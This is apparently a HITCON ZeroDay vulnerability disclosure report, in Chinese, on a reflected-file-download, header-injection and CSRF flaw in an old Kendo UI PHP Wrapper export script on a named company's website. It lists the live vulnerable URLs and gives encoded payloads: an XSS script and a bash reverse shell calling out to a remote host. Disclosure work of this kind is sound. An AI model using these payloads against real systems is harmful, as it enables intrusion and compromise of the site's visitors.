Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-00829
- Vendor: 岱宇國際股份有限公司
- Title: 岱宇國際股份有限公司 白箱測試 - Reflected File Download (RFD) via Header Injection(Content-Type) + CSRF
- Introduction: 攻擊者可透過 HTTP Header 注入 操縱請求響應內容,結合 CSRF 手法繞過瀏覽器保護機制,讓受害者從信任的網站下載惡意腳本
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2026/06/10 01:13:21 : 新提交 (由 阿文 更新此狀態)
- 2026/06/10 12:54:26 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/02 17:31:01 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/02 17:31:01 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/08/10 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-00829
- 通報者:littlebabywen (阿文)
- 風險:高
- 類型:HTTP Header 注入 (HTTP Header Injection)
參考資料
漏洞說明: OWASP - Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)
https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
漏洞說明: HTTP Header Injection
https://www.gracefulsecurity.com/http-header-injection/
相關網址
http://po.dyaco.com/iron/telerik/wrappers/php/grid/pdf-export.php?type=save
敘述
-
根據 ZD-2026-00828 通報,可以發現該單位有使用 Kendo UI PHP Wrapper 第三方套件,查看了版本會發現是 2016 年舊版套件,可以預估會有一些風險發現。
-
http://po.dyaco.com/iron/telerik/wrappers/php/ 此資源路徑也顯示了所有套件之原始碼。
-
這邊白箱分析舉例 "http://po.dyaco.com/iron/telerik/wrappers/php/pivotgrid/pdf-export.php" 擁有 Reflected File Download (RFD) + Header Injection(Content-Type) 之風險,以下為 pdf-export.php 之原始碼。
-
可以發現對於欄位 fileName、contentType、base64 沒有任何檢查機制和信任來源,利用 burp suite 可構造此資源的請求,攻擊者藉由 "http://po.dyaco.com/iron/telerik/wrappers/php/pivotgrid/pdf-export.php?type=save" 執行 POST 請求,並且構造 "fileName=&contentType=&base64=" 參數,contentType 可指定任何文件類型,base64 可以指定任何程式語言語法,包含 javascript、windows shell、linux shell 語法等讓受害者從合法信任的網站下載惡意腳本。
-
舉例一 : Javascript 語法 - 可導致 XSS 攻擊。
fileName=xss.html&contentType=text/html&base64=%50%48%4e%6a%63%6d%6c%77%64%44%35%68%62%47%56%79%64%43%67%6e%57%46%4e%54%49%46%42%50%51%79%63%70%50%43%39%7a%59%33%4a%70%63%48%51%2b -
舉例二 : Linux shell 指令 - 可導致受害者下載惡意腳本
fileName=aaa.sh&contentType=application/x-sh&base64=%59%6d%46%7a%61%43%41%74%59%79%41%69%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%51%31%4c%6a%45%33%4e%53%38%30%4e%44%51%30%49%44%41%2b%4a%6a%45%69 -
此資源因為沒有 set-cookie 機制跟防範 Origin 或 Referer 標頭,即擁有 CSRF 風險,攻擊者就可以利用上述風險自製一個釣魚連結,誘使受害者去下載惡意檔案、惡意腳本。
(這邊利用 Burp CSRF PoC 客製化釣魚連結) -
也可以指定下載 .sh 檔案。
-
http://po.dyaco.com/iron/telerik/wrappers/php/grid/pdf-export.php?type=save 這支資源也有上述風險,就不再舉例。
修補建議
1. 若 Kendo UI PHP Wrapper 此地三方套件沒再使用的話,請盡速移除,或尋找更多穩定安全的第三方套件。